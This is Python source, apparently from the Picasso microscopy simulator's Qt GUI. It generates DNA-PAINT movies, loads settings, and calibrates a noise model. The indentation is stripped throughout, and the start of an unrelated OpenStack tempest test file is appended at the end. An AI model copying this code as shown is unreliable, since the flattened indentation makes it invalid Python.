spotkinetics = _np.zeros((nosites, 4), dtype=_np.float)
timetrace = {}
for i in range(0, nosites):
p_temp, t_temp, k_temp = simulate.distphotons(
partstruct,
itime,
frames,
taud,
taub,
photonrate,
photonratestd,
photonbudget,
)
photondist[i, :] = p_temp
spotkinetics[i, :] = k_temp
timetrace[i] = self.vectorToString(t_temp)
outputmsg = (
"Distributing photons ... "
+ str(_np.round(i / nosites * 1000) / 10)
+ " %"
)
self.statusBar().showMessage(outputmsg)
self.mainpbar.setValue(_np.round(i / nosites * 1000) / 10)
self.statusBar().showMessage("Converting to image ... ")
onevents = self.vectorToString(spotkinetics[:, 0])
localizations = self.vectorToString(spotkinetics[:, 1])
meandarksim = self.vectorToString(spotkinetics[:, 2])
meanbrightsim = self.vectorToString(spotkinetics[:, 3])
movie = _np.zeros(shape=(frames, imagesize, imagesize))
info = {
"Generated by": "Picasso simulate",
"Byte Order": "<",
"Camera": "Simulation",
"Data Type": "uint16",
"Frames": frames,
"Structure.Frame": structureFrame,
"Structure.Number": structureNo,
"Structure.StructureX": structurex,
"Structure.StructureY": structurey,
"Structure.StructureEx": structureextxt,
"Structure.Structure3D": structure3dtxt,
"Structure.HandleX": handlex,
"Structure.HandleY": handley,
"Structure.HandleEx": handleex,
"Structure.Handle3d": handle3d,
"Structure.HandleStruct": handless,
"Structure.Incorporation": structureIncorporation,
"Structure.Arrangement": structureArrangement,
"Structure.Orientation": structureOrientation,
"Structure.3D": mode3Dstate,
"Structure.CX": self.cx,
"Structure.CY": self.cy,
"PAINT.k_on": kon,
"PAINT.imager": imagerconcentration,
"PAINT.taub": taub,
"Imager.PSF": psf,
"Imager.Photonrate": photonrate,
"Imager.Photonrate Std": photonratestd,
"Imager.Constant Photonrate Std": int(
self.photonslopemodeEdit.checkState()
),
"Imager.Photonbudget": photonbudget,
"Imager.Laserpower": laserpower,
"Imager.Photonslope": photonslope,
"Imager.PhotonslopeStd": photonslopeStd,
"Imager.BackgroundLevel": self.backgroundlevelEdit.value(),
"Camera.Image Size": imagesize,
"Camera.Integration Time": itime,
"Camera.Frames": frames,
"Camera.Pixelsize": pixelsize,
"Noise.Lasercoefficient": laserc,
"Noise.Imagercoefficient": imagerc,
"Noise.EquationA": equationA,
"Noise.EquationB": equationB,
"Noise.EquationC": equationC,
"Noise.BackgroundOff": bgoffset,
"Noise.BackgroundStdOff": bgstdoffset,
"Spotkinetics.ON_Events": onevents,
"Spotkinetics.Localizations": localizations,
"Spotkinetics.MEAN_DARK": meandarksim,
"Spotkinetics.MEAN_BRIGHT": meanbrightsim,
"Height": imagesize,
"Width": imagesize,
}
if conrounds is not 1:
app = QtCore.QCoreApplication.instance()
for runner in range(0, frames):
movie[runner, :, :] = simulate.convertMovie(
runner,
photondist,
partstruct,
imagesize,
frames,
psf,
photonrate,
background,
noise,
mode3Dstate,
self.cx,
self.cy,
)
outputmsg = (
"Converting to Image ... "
+ str(_np.round(runner / frames * 1000) / 10)
+ " %"
)
self.statusBar().showMessage(outputmsg)
self.mainpbar.setValue(
_np.round(runner / frames * 1000) / 10
)
app.processEvents()
if self.currentround == 1:
self.movie = movie
else:
movie = movie + self.movie
self.movie = movie
self.statusBar().showMessage(
"Converting to image ... complete. Current round: "
+ str(self.currentround)
+ " of "
+ str(conrounds)
+ ". Please set and start next round."
)
if self.currentround == conrounds:
self.statusBar().showMessage(
"Adding noise to movie ..."
)
movie = simulate.noisy_p(movie, background)
movie = simulate.check_type(movie)
self.statusBar().showMessage("Saving movie ...")
simulate.saveMovie(fileName, movie, info)
self.statusBar().showMessage(
"Movie saved to: " + fileName
)
dt = time.time() - t0
self.statusBar().showMessage(
"All computations finished. Last file saved to: "
+ fileName
+ ". Time elapsed: {:.2f} Seconds.".format(dt)
)
self.currentround = 0
else: # just save info file
# self.statusBar().showMessage('Saving yaml ...')
info_path = (
_ospath.splitext(fileName)[0]
+ "_"
+ str(self.currentround)
+ ".yaml"
)
_io.save_info(info_path, [info])
if self.exportkinetics.isChecked():
# Export the kinetic data if this is checked
kinfo_path = (
_ospath.splitext(fileName)[0]
+ "_"
+ str(self.currentround)
+ "_kinetics.yaml"
)
_io.save_info(kinfo_path, [timetrace])
self.statusBar().showMessage(
"Movie saved to: " + fileName
)
else:
app = QtCore.QCoreApplication.instance()
for runner in range(0, frames):
movie[runner, :, :] = simulate.convertMovie(
runner,
photondist,
partstruct,
imagesize,
frames,
psf,
photonrate,
background,
noise,
mode3Dstate,
self.cx,
self.cy,
)
outputmsg = (
"Converting to Image ... "
+ str(_np.round(runner / frames * 1000) / 10)
+ " %"
)
self.statusBar().showMessage(outputmsg)
self.mainpbar.setValue(
_np.round(runner / frames * 1000) / 10
)
app.processEvents()
movie = simulate.noisy_p(movie, background)
movie = simulate.check_type(movie)
self.mainpbar.setValue(100)
self.statusBar().showMessage(
"Converting to image ... complete."
)
self.statusBar().showMessage("Saving movie ...")
simulate.saveMovie(fileName, movie, info)
if self.exportkinetics.isChecked():
# Export the kinetic data if this is checked
kinfo_path = (
_ospath.splitext(fileName)[0] + "_kinetics.yaml"
)
_io.save_info(kinfo_path, [timetrace])
self.statusBar().showMessage("Movie saved to: " + fileName)
dt = time.time() - t0
self.statusBar().showMessage(
"All computations finished. Last file saved to: "
+ fileName
+ ". Time elapsed: {:.2f} Seconds.".format(dt)
)
self.currentround = 0
def loadSettings(self): # TODO: re-write exceptions, check key
path, exe = QtWidgets.QFileDialog.getOpenFileName(
self, "Open yaml", filter="*.yaml"
)
if path:
info = _io.load_info(path)
self.framesEdit.setValue(info[0]["Frames"])
self.structureframeEdit.setValue(info[0]["Structure.Frame"])
self.structurenoEdit.setValue(info[0]["Structure.Number"])
self.structurexxEdit.setText(info[0]["Structure.StructureX"])
self.structureyyEdit.setText(info[0]["Structure.StructureY"])
self.structureexEdit.setText(info[0]["Structure.StructureEx"])
try:
self.structure3DEdit.setText(info[0]["Structure.Structure3D"])
self.mode3DEdit.setCheckState(info[0]["Structure.3D"])
self.cx(info[0]["Structure.CX"])
self.cy(info[0]["Structure.CY"])
except Exception as e:
print(e)
pass
try:
self.photonslopemodeEdit.setCheckState(
info[0]["Imager.Constant Photonrate Std"]
)
except Exception as e:
print(e)
pass
try:
self.backgroundlevelEdit.setValue(
info[0]["Imager.BackgroundLevel"]
)
except Exception as e:
print(e)
pass
self.structureIncorporationEdit.setValue(
info[0]["Structure.Incorporation"]
)
self.structurerandomEdit.setCheckState(
info[0]["Structure.Arrangement"]
)
self.structurerandomOrientationEdit.setCheckState(
info[0]["Structure.Orientation"]
)
self.konEdit.setValue(info[0]["PAINT.k_on"])
self.imagerconcentrationEdit.setValue(info[0]["PAINT.imager"])
self.taubEdit.setValue(info[0]["PAINT.taub"])
self.psfEdit.setValue(info[0]["Imager.PSF"])
self.photonrateEdit.setValue(info[0]["Imager.Photonrate"])
self.photonratestdEdit.setValue(info[0]["Imager.Photonrate Std"])
self.photonbudgetEdit.setValue(info[0]["Imager.Photonbudget"])
self.laserpowerEdit.setValue(info[0]["Imager.Laserpower"])
self.photonslopeEdit.setValue(info[0]["Imager.Photonslope"])
self.photonslopeStdEdit.setValue(info[0]["Imager.PhotonslopeStd"])
self.camerasizeEdit.setValue(info[0]["Camera.Image Size"])
self.integrationtimeEdit.setValue(
info[0]["Camera.Integration Time"]
)
self.framesEdit.setValue(info[0]["Camera.Frames"])
self.pixelsizeEdit.setValue(info[0]["Camera.Pixelsize"])
if ADVANCEDMODE:
self.lasercEdit.setValue(info[0]["Noise.Lasercoefficient"])
self.imagercEdit.setValue(info[0]["Noise.Imagercoefficient"])
self.BgoffsetEdit.setValue(info[0]["Noise.BackgroundOff"])
self.EquationAEdit.setValue(info[0]["Noise.EquationA"])
self.EquationBEdit.setValue(info[0]["Noise.EquationB"])
self.EquationCEdit.setValue(info[0]["Noise.EquationC"])
self.BgStdoffsetEdit.setValue(
info[0]["Noise.BackgroundStdOff"]
)
# SET POSITIONS
handlexx = _np.asarray((info[0]["Structure.HandleX"]).split(","))
handleyy = _np.asarray((info[0]["Structure.HandleY"]).split(","))
handleex = _np.asarray((info[0]["Structure.HandleEx"]).split(","))
handless = _np.asarray(
(info[0]["Structure.HandleStruct"]).split(",")
)
handlexx = handlexx.astype(_np.float)
handleyy = handleyy.astype(_np.float)
handleex = handleex.astype(_np.float)
handless = handless.astype(_np.float)
handleex = handleex.astype(_np.int)
handless = handless.astype(_np.int)
handle3d = _np.asarray((info[0]["Structure.Handle3d"]).split(","))
handle3d = handle3d.astype(_np.float)
structure = _np.array(
[handlexx, handleyy, handleex, handless, handle3d]
)
self.structurecombo.setCurrentIndex(2)
self.newstruct = structure
self.plotPositions()
self.statusBar().showMessage("Settings loaded from: " + path)
def importDesign(self):
path, exe = QtWidgets.QFileDialog.getOpenFileName(
self, "Open yaml", filter="*.yaml"
)
if path:
info = _io.load_info(path)
self.structurexxEdit.setText(info[0]["Structure.StructureX"])
self.structureyyEdit.setText(info[0]["Structure.StructureY"])
self.structureexEdit.setText(info[0]["Structure.StructureEx"])
structure3d = ""
for i in range(0, len(self.structurexxEdit.text())):
structure3d = structure3d + "0,"
self.structure3DEdit.setText(structure3d)
self.structurecombo.setCurrentIndex(2)
def readLine(self, linetxt, type="float", textmode=True):
if textmode:
line = _np.asarray((linetxt.text()).split(","))
else:
line = _np.asarray((linetxt.split(",")))
values = []
for element in line:
try:
if type == "int":
values.append(int(element))
elif type == "float":
values.append(float(element))
except ValueError:
pass
return values
def importHandles(self):
# Import structure <>
self.handles = {}
path, exe = QtWidgets.QFileDialog.getOpenFileName(
self, "Open yaml", filter="*.yaml *.hdf5"
)
if path:
splitpath = _ospath.splitext(path)
if splitpath[-1] == ".yaml":
info = _io.load_info(path)
x = self.readLine(
info[0]["Structure.StructureX"], textmode=False
)
y = self.readLine(
info[0]["Structure.StructureY"], textmode=False
)
try:
ex = self.readLine(
info[0]["Structure.StructureEx"],
type="int",
textmode=False,
)
except Exception as e:
print(e)
ex = _np.ones_like(x)
try:
z = self.readLine(info[0]["Structure.Structure3D"])
except Exception as e:
print(e)
z = _np.zeros_like(x)
minlen = min(len(x), len(y), len(ex), len(z))
x = x[0:minlen]
y = y[0:minlen]
ex = ex[0:minlen]
z = z[0:minlen]
else:
clusters = _io.load_clusters(path)
pixelsize = self.pixelsizeEdit.value()
imagesize = self.camerasizeEdit.value()
x = clusters["com_x"]
y = clusters["com_y"]
# Align in the center of window:
x = x - _np.mean(x) + imagesize / 2
y = -(y - _np.mean(y)) + imagesize / 2
x = x * pixelsize
y = y * pixelsize
try:
z = clusters["com_z"]
except Exception as e:
print(e)
z = _np.zeros_like(x)
ex = _np.ones_like(x)
minlen = len(x)
self.handles["x"] = x
self.handles["y"] = y
self.handles["z"] = z
self.handles["ex"] = ex
# TODO: Check axis orientation
exchangecolors = list(set(self.handles["ex"]))
exchangecolorsList = ",".join(map(str, exchangecolors))
# UPDATE THE EXCHANGE COLORS IN BUTTON TO BE simulated
self.exchangeroundsEdit.setText(str(exchangecolorsList))
self.structurenoEdit.setValue(1)
self.structureMode = False
self.generatePositions()
self.statusBar().showMessage(
"A total of {} points loaded.".format(minlen)
)
def readStructure(self):
structurexx = self.readLine(self.structurexxEdit)
structureyy = self.readLine(self.structureyyEdit)
structureex = self.readLine(self.structureexEdit, "int")
structure3d = self.readLine(self.structure3DEdit)
minlen = min(
len(structureex),
len(structurexx),
len(structureyy),
len(structure3d),
)
structurexx = structurexx[0:minlen]
structureyy = structureyy[0:minlen]
structureex = structureex[0:minlen]
structure3d = structure3d[0:minlen]
return structurexx, structureyy, structureex, structure3d
def plotStructure(self):
structurexx, structureyy, structureex, structure3d = (
self.readStructure()
)
noexchangecolors = len(set(structureex))
exchangecolors = list(set(structureex))
# self.figure2.suptitle('Structure [nm]')
ax1 = self.figure2.add_subplot(111)
ax1.cla()
#ax1.hold(True)
ax1.axis("equal")
for i in range(0, noexchangecolors):
plotxx = []
plotyy = []
for j in range(0, len(structureex)):
if structureex[j] == exchangecolors[i]:
plotxx.append(structurexx[j])
plotyy.append(structureyy[j])
ax1.plot(plotxx, plotyy, "o")
distx = round(1 / 10 * (max(structurexx) - min(structurexx)))
disty = round(1 / 10 * (max(structureyy) - min(structureyy)))
ax1.axes.set_xlim((min(structurexx) - distx, max(structurexx) + distx))
ax1.axes.set_ylim((min(structureyy) - disty, max(structureyy) + disty))
self.canvas2.draw()
exchangecolorsList = ",".join(map(str, exchangecolors))
# UPDATE THE EXCHANGE COLORS IN BUTTON TO BE simulated
self.exchangeroundsEdit.setText(str(exchangecolorsList))
def generatePositions(self):
self.plotStructure()
pixelsize = self.pixelsizeEdit.value()
if self.structureMode:
structurexx, structureyy, structureex, structure3d = (
self.readStructure()
)
structure = simulate.defineStructure(
structurexx, structureyy, structureex, structure3d, pixelsize
)
else:
structurexx = self.handles["x"]
structureyy = self.handles["y"]
structureex = self.handles["ex"]
structure3d = self.handles["z"]
structure = simulate.defineStructure(
structurexx,
structureyy,
structureex,
structure3d,
pixelsize,
mean=False,
)
number = self.structurenoEdit.value()
imageSize = self.camerasizeEdit.value()
frame = self.structureframeEdit.value()
arrangement = int(self.structurerandomEdit.checkState())
gridpos = simulate.generatePositions(
number, imageSize, frame, arrangement
)
orientation = int(self.structurerandomOrientationEdit.checkState())
incorporation = self.structureIncorporationEdit.value() / 100
exchange = 0
if self.structureMode:
self.newstruct = simulate.prepareStructures(
structure,
gridpos,
orientation,
number,
incorporation,
exchange,
)
else:
self.newstruct = simulate.prepareStructures(
structure,
_np.array([[0, 0]]),
orientation,
number,
incorporation,
exchange,
)
in_x = _np.logical_and(
self.newstruct[0, :] < (imageSize - frame),
self.newstruct[0, :] > frame,
)
in_y = _np.logical_and(
self.newstruct[1, :] < (imageSize - frame),
self.newstruct[1, :] > frame,
)
in_frame = _np.logical_and(in_x, in_y)
self.newstruct = self.newstruct[:, in_frame]
# self.figure1.suptitle('Positions [Px]')
ax1 = self.figure1.add_subplot(111)
ax1.cla()
#ax1.hold(True)
ax1.axis("equal")
ax1.plot(self.newstruct[0, :], self.newstruct[1, :], "+")
# PLOT FRAME
ax1.add_patch(
patches.Rectangle(
(frame, frame),
imageSize - 2 * frame,
imageSize - 2 * frame,
linestyle="dashed",
edgecolor="#000000",
fill=False, # remove background
)
)
ax1.axes.set_xlim(0, imageSize)
ax1.axes.set_ylim(0, imageSize)
self.canvas1.draw()
# PLOT first structure
struct1 = self.newstruct[:, self.newstruct[3, :] == 0]
noexchangecolors = len(set(struct1[2, :]))
exchangecolors = list(set(struct1[2, :]))
self.noexchangecolors = exchangecolors
# self.figure2.suptitle('Structure [nm]')
ax1 = self.figure2.add_subplot(111)
ax1.cla()
#ax1.hold(True)
ax1.axis("equal")
structurexx = struct1[0, :]
structureyy = struct1[1, :]
structureex = struct1[2, :]
structurexx_nm = _np.multiply(
structurexx - min(structurexx), pixelsize
)
structureyy_nm = _np.multiply(
structureyy - min(structureyy), pixelsize
)
for i in range(0, noexchangecolors):
plotxx = []
plotyy = []
for j in range(0, len(structureex)):
if structureex[j] == exchangecolors[i]:
plotxx.append(structurexx_nm[j])
plotyy.append(structureyy_nm[j])
ax1.plot(plotxx, plotyy, "o")
distx = round(1 / 10 * (max(structurexx_nm) - min(structurexx_nm)))
disty = round(1 / 10 * (max(structureyy_nm) - min(structureyy_nm)))
ax1.axes.set_xlim(
(min(structurexx_nm) - distx, max(structurexx_nm) + distx)
)
ax1.axes.set_ylim(
(min(structureyy_nm) - disty, max(structureyy_nm) + disty)
)
self.canvas2.draw()
def plotPositions(self):
structurexx, structureyy, structureex, structure3d = (
self.readStructure()
)
pixelsize = self.pixelsizeEdit.value()
structure = simulate.defineStructure(
structurexx, structureyy, structureex, structure3d, pixelsize
)
number = self.structurenoEdit.value()
imageSize = self.camerasizeEdit.value()
frame = self.structureframeEdit.value()
arrangement = int(self.structurerandomEdit.checkState())
gridpos = simulate.generatePositions(
number, imageSize, frame, arrangement
)
orientation = int(self.structurerandomOrientationEdit.checkState())
incorporation = self.structureIncorporationEdit.value() / 100
exchange = 0
# self.figure1.suptitle('Positions [Px]')
ax1 = self.figure1.add_subplot(111)
ax1.cla()
#ax1.hold(True)
ax1.axis("equal")
ax1.plot(self.newstruct[0, :], self.newstruct[1, :], "+")
# PLOT FRAME
ax1.add_patch(
patches.Rectangle(
(frame, frame),
imageSize - 2 * frame,
imageSize - 2 * frame,
linestyle="dashed",
edgecolor="#000000",
fill=False, # remove background
)
)
ax1.axes.set_xlim(0, imageSize)
ax1.axes.set_ylim(0, imageSize)
self.canvas1.draw()
# PLOT first structure
struct1 = self.newstruct[:, self.newstruct[3, :] == 0]
noexchangecolors = len(set(struct1[2, :]))
exchangecolors = list(set(struct1[2, :]))
self.noexchangecolors = exchangecolors
# self.figure2.suptitle('Structure [nm]')
ax1 = self.figure2.add_subplot(111)
ax1.cla()
#ax1.hold(True)
structurexx = struct1[0, :]
structureyy = struct1[1, :]
structureex = struct1[2, :]
structurexx_nm = _np.multiply(
structurexx - min(structurexx), pixelsize
)
structureyy_nm = _np.multiply(
structureyy - min(structureyy), pixelsize
)
for i in range(0, noexchangecolors):
plotxx = []
plotyy = []
for j in range(0, len(structureex)):
if structureex[j] == exchangecolors[i]:
plotxx.append(structurexx_nm[j])
plotyy.append(structureyy_nm[j])
ax1.plot(plotxx, plotyy, "o")
distx = round(1 / 10 * (max(structurexx_nm) - min(structurexx_nm)))
disty = round(1 / 10 * (max(structureyy_nm) - min(structureyy_nm)))
ax1.axes.set_xlim(
(min(structurexx_nm) - distx, max(structurexx_nm) + distx)
)
ax1.axes.set_ylim(
(min(structureyy_nm) - disty, max(structureyy_nm) + disty)
)
self.canvas2.draw()
def openDialog(self):
path, exe = QtWidgets.QFileDialog.getOpenFileName(
self, "Open design", filter="*.yaml"
)
if path:
self.mainscene.loadCanvas(path)
self.statusBar().showMessage("File loaded from: " + path)
def importhdf5(self):
path, exe = QtWidgets.QFileDialog.getOpenFileName(
self, "Open localizations", filter="*.hdf5"
)
if path:
self.readhdf5(path)
def calibrateNoise(self):
bg, bgstd, las, time, conc, ok = CalibrationDialog.setExt()
_np.asarray(bg)
_np.asarray(bgstd)
_np.asarray(las)
_np.asarray(time)
_np.asarray(conc)
x_3d = _np.array([conc, las, time])
p0 = [1, 1]
fitParamsBg, fitCovariances = curve_fit(fitFuncBg, x_3d, bg, p0)
print(" fit coefficients :\n", fitParamsBg)
# SET VALUES TO PARAMETER
self.lasercEdit.setValue(fitParamsBg[0])
self.imagercEdit.setValue(fitParamsBg[1])
x_3dStd = _np.array([las, time, bg])
p0S = [1, 1, 1]
fitParamsStd, fitCovariances = curve_fit(
fitFuncStd, x_3dStd, bgstd, p0S
)
print(" fit coefficients2:\n", fitParamsStd)
self.EquationAEdit.setValue(fitParamsStd[0])
self.EquationBEdit.setValue(fitParamsStd[1])
self.EquationCEdit.setValue(fitParamsStd[2])
# Noise model working point
figure4 = plt.figure()
# Background
bgmodel = fitFuncBg(x_3d, fitParamsBg[0], fitParamsBg[1])
ax1 = figure4.add_subplot(121)
ax1.cla()
ax1.plot(bg, bgmodel, "o")
x = _np.linspace(*ax1.get_xlim())
ax1.plot(x, x)
title = "Background Model:"
ax1.set_title(title)
# Std
bgmodelstd = fitFuncStd(
x_3dStd, fitParamsStd[0], fitParamsStd[1], fitParamsStd[2]
)
ax2 = figure4.add_subplot(122)
ax2.cla()
ax2.plot(bgstd, bgmodelstd, "o")
x = _np.linspace(*ax2.get_xlim())
ax2.plot(x, x)
title = "Background Model Std:"
ax2.set_title(title)
figure4.show()
def sigmafilter(self, data, sigmas):
# Filter data to be withing +- sigma
sigma = _np.std(data)
mean = _np.mean(data)
datanew = data[data < (mean + sigmas * sigma)]
datanew = datanew[datanew > (mean - sigmas * sigma)]
return datanew
def readhdf5(self, path):
try:
locs, self.info = _io.load_locs(path, qt_parent=self)
except _io.NoMetadataFileError:
return
integrationtime, ok1 = QtWidgets.QInputDialog.getText(
self, "Input Dialog", "Enter integration time in ms:"
)
integrationtime = int(integrationtime)
if ok1:
imagerconcentration, ok2 = QtWidgets.QInputDialog.getText(
self, "Input Dialog", "Enter imager concentration in nM:"
)
imagerconcentration = float(imagerconcentration)
if ok2:
laserpower, ok3 = QtWidgets.QInputDialog.getText(
self, "Input Dialog", "Enter Laserpower in mW:"
)
laserpower = float(laserpower)
if ok3:
cbaseline, ok4 = QtWidgets.QInputDialog.getText(
self, "Input Dialog", "Enter camera baseline"
)
cbaseline = float(cbaseline)
# self.le.setText(str(text))
photons = locs["photons"]
sigmax = locs["sx"]
sigmay = locs["sy"]
bg = locs["bg"]
bg = bg - cbaseline
nosigmas = 3
photons = self.sigmafilter(photons, nosigmas)
sigmax = self.sigmafilter(sigmax, nosigmas)
sigmay = self.sigmafilter(sigmay, nosigmas)
bg = self.sigmafilter(bg, nosigmas)
figure3 = plt.figure()
# Photons
photonsmu, photonsstd = norm.fit(photons)
ax1 = figure3.add_subplot(131)
ax1.cla()
#ax1.hold(True) # TODO: Investigate again what this causes
ax1.hist(photons, bins=25, normed=True, alpha=0.6)
xmin, xmax = plt.xlim()
x = _np.linspace(xmin, xmax, 100)
p = norm.pdf(x, photonsmu, photonsstd)
ax1.plot(x, p)
title = "Photons:\n mu = %.2f\n std = %.2f" % (
photonsmu,
photonsstd,
)
ax1.set_title(title)
# Sigma X & Sigma Y
sigma = _np.concatenate((sigmax, sigmay), axis=0)
sigmamu, sigmastd = norm.fit(sigma)
ax2 = figure3.add_subplot(132)
ax2.cla()
#ax2.hold(True)
ax2.hist(sigma, bins=25, normed=True, alpha=0.6)
xmin, xmax = plt.xlim()
x = _np.linspace(xmin, xmax, 100)
p = norm.pdf(x, sigmamu, sigmastd)
ax2.plot(x, p)
title = "PSF:\n mu = %.2f\n std = %.2f" % (
sigmamu,
sigmastd,
)
ax2.set_title(title)
# Background
bgmu, bgstd = norm.fit(bg)
ax3 = figure3.add_subplot(133)
ax3.cla()
#ax3.hold(True)
# Plot the histogram.
ax3.hist(bg, bins=25, normed=True, alpha=0.6)
xmin, xmax = plt.xlim()
x = _np.linspace(xmin, xmax, 100)
p = norm.pdf(x, bgmu, bgstd)
ax3.plot(x, p)
title = "Background:\n mu = %.2f\n std = %.2f" % (
bgmu,
bgstd,
)
ax3.set_title(title)
figure3.tight_layout()
figure3.show()
# Calculate Rates
# Photonrate, Photonrate Std, PSF
photonrate = int(photonsmu / integrationtime)
photonratestd = int(photonsstd / integrationtime)
psf = int(sigmamu * 100) / 100
photonrate = int(photonsmu / integrationtime)
# CALCULATE BG AND BG_STD FROM MODEL AND ADJUST OFFSET
laserc = self.lasercEdit.value()
imagerc = self.imagercEdit.value()
bgmodel = (
(laserc + imagerc * imagerconcentration)
* laserpower
* integrationtime
)
equationA = self.EquationAEdit.value()
equationB = self.EquationBEdit.value()
equationC = self.EquationCEdit.value()
bgmodelstd = (
equationA * laserpower * integrationtime
+ equationB * bgmu
+ equationC
)
# SET VALUES TO FIELDS AND CALL DEPENDENCIES
self.psfEdit.setValue(psf)
self.integrationtimeEdit.setValue(integrationtime)
self.photonrateEdit.setValue(photonrate)
self.photonratestdEdit.setValue(photonratestd)
self.photonslopeEdit.setValue(photonrate / laserpower)
self.photonslopeStdEdit.setValue(
photonratestd / laserpower
)
# SET NOISE AND FRAME
self.BgoffsetEdit.setValue(bgmu - bgmodel)
self.BgStdoffsetEdit.setValue(bgstd - bgmodelstd)
self.imagerconcentrationEdit.setValue(imagerconcentration)
self.laserpowerEdit.setValue(laserpower)
class CalibrationDialog(QtWidgets.QDialog):
def __init__(self, parent=None):
super(CalibrationDialog, self).__init__(parent)
layout = QtWidgets.QVBoxLayout(self)
self.table = QtWidgets.QTableWidget()
self.table.setWindowTitle("Noise Model Calibration")
self.setWindowTitle("Noise Model Calibration")
# self.resize(800, 400)
layout.addWidget(self.table)
# ADD BUTTONS:
self.loadTifButton = QtWidgets.QPushButton("Load Tifs")
layout.addWidget(self.loadTifButton)
self.evalTifButton = QtWidgets.QPushButton("Evaluate Tifs")
layout.addWidget(self.evalTifButton)
self.pbar = QtWidgets.QProgressBar(self)
layout.addWidget(self.pbar)
self.loadTifButton.clicked.connect(self.loadTif)
self.evalTifButton.clicked.connect(self.evalTif)
self.buttons = QDialogButtonBox(
QDialogButtonBox.ActionRole
| QDialogButtonBox.Ok
| QDialogButtonBox.Cancel,
Qt.Horizontal,
self,
)
layout.addWidget(self.buttons)
self.buttons.accepted.connect(self.accept)
self.buttons.rejected.connect(self.reject)
def exportTable(self):
table = dict()
tablecontent = []
tablecontent.append(
[
"FileName",
"Imager concentration[nM]",
"Integration time [ms]",
"Laserpower",
"Mean [Photons]",
"Std [Photons]",
]
)
for row in range(self.table.rowCount()):
rowdata = []
for column in range(self.table.columnCount()):
item = self.table.item(row, column)
if item is not None:
rowdata.append(item.text())
else:
rowdata.append("")
tablecontent.append(rowdata)
table[0] = tablecontent
path, ext = QtWidgets.QFileDialog.getSaveFileName(
self, "Export calibration table to.", filter="*.csv"
)
if path:
self.savePlate(path, table)
def savePlate(self, filename, data):
with open(filename, "w", newline="") as csvfile:
Writer = csv.writer(
csvfile,
delimiter=",",
quotechar="|",
quoting=csv.QUOTE_MINIMAL,
)
for j in range(0, len(data)):
exportdata = data[j]
for i in range(0, len(exportdata)):
Writer.writerow(exportdata[i])
def evalTif(self):
baseline, ok1 = QtWidgets.QInputDialog.getText(
self, "Input Dialog", "Enter Camera Baseline:"
)
if ok1:
baseline = int(baseline)
else:
baseline = 200 # default
sensitvity, ok2 = QtWidgets.QInputDialog.getText(
self, "Input Dialog", "Enter Camera Sensitivity:"
)
if ok2:
sensitvity = float(sensitvity)
else:
sensitvity = 1.47
counter = 0
for element in self.tifFiles:
counter = counter + 1
self.pbar.setValue((counter - 1) / self.tifCounter * 100)
print(
"Current Dataset: "
+ str(counter)
+ " of "
+ str(self.tifCounter)
)
QtWidgets.qApp.processEvents()
movie, info = _io.load_movie(element)
movie = movie[0:100, :, :]
movie = (movie - baseline) * sensitvity
self.table.setItem(
counter - 1, 4, QtWidgets.QTableWidgetItem(str((_np.mean(movie))))
)
self.table.setItem(
counter - 1, 5, QtWidgets.QTableWidgetItem(str((_np.std(movie))))
)
self.table.setItem(
counter - 1,
1,
QtWidgets.QTableWidgetItem(str((self.ValueFind(element, "nM_")))),
)
self.table.setItem(
counter - 1,
2,
QtWidgets.QTableWidgetItem(str((self.ValueFind(element, "ms_")))),
)
self.table.setItem(
counter - 1,
3,
QtWidgets.QTableWidgetItem(str((self.ValueFind(element, "mW_")))),
)
self.pbar.setValue(100)
def ValueFind(self, filename, unit):
index = filename.index(unit)
value = 0
for i in range(4):
try:
value += int(filename[index - 1 - i]) * (10 ** i)
except ValueError:
pass
return value
def loadTif(self):
self.path = QtWidgets.QFileDialog.getExistingDirectory(
self, "Select Directory"
)
if self.path:
self.tifCounter = len(_glob.glob1(self.path, "*.tif"))
self.tifFiles = _glob.glob(os.path.join(self.path, "*.tif"))
self.table.setRowCount(int(self.tifCounter))
self.table.setColumnCount(6)
self.table.setHorizontalHeaderLabels(
[
"FileName",
"Imager concentration[nM]",
"Integration time [ms]",
"Laserpower",
"Mean [Photons]",
"Std [Photons]",
]
)
for i in range(0, self.tifCounter):
self.table.setItem(
i, 0, QtWidgets.QTableWidgetItem(self.tifFiles[i])
)
def changeComb(self, indexval):
sender = self.sender()
comboval = sender.currentIndex()
if comboval == 0:
self.table.setItem(indexval, 2, QtWidgets.QTableWidgetItem(""))
self.table.setItem(indexval, 3, QtWidgets.QTableWidgetItem(""))
else:
self.table.setItem(
indexval,
2,
QtWidgets.QTableWidgetItem(self.ImagersShort[comboval]),
)
self.table.setItem(
indexval, 3, QtWidgets.QTableWidgetItem(self.ImagersLong[comboval])
)
def readoutTable(self):
tableshort = dict()
tablelong = dict()
maxcolor = 15
for i in range(0, maxcolor - 1):
try:
tableshort[i] = self.table.item(i, 2).text()
if tableshort[i] == "":
tableshort[i] = "None"
except AttributeError:
tableshort[i] = "None"
try:
tablelong[i] = self.table.item(i, 3).text()
if tablelong[i] == "":
tablelong[i] = "None"
except AttributeError:
tablelong[i] = "None"
return tablelong, tableshort
# get current date and time from the dialog
def evalTable(self):
conc = []
time = []
las = []
bg = []
bgstd = []
for i in range(0, self.tifCounter):
conc.append(float(self.table.item(i, 1).text()))
time.append(float(self.table.item(i, 2).text()))
las.append(float(self.table.item(i, 3).text()))
bg.append(float(self.table.item(i, 4).text()))
bgstd.append(float(self.table.item(i, 5).text()))
# self.exportTable()
return bg, bgstd, las, time, conc
# static method to create the dialog and return (date, time, accepted)
@staticmethod
def setExt(parent=None):
dialog = CalibrationDialog(parent)
result = dialog.exec_()
bg, bgstd, las, time, conc = dialog.evalTable()
return (bg, bgstd, las, time, conc, result == QDialog.Accepted)
def main():
app = QtWidgets.QApplication(sys.argv)
window = Window()
window.show()
sys.exit(app.exec_())
def excepthook(type, value, tback):
lib.cancel_dialogs()
message = "".join(traceback.format_exception(type, value, tback))
errorbox = QtWidgets.QMessageBox.critical(
window, "An error occured", message
)
errorbox.exec_()
sys.__excepthook__(type, value, tback)
sys.excepthook = excepthook
if __name__ == "__main__":
main()
|
the-stack_106_23269 | # Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.volume import base
from tempest.lib import decorators
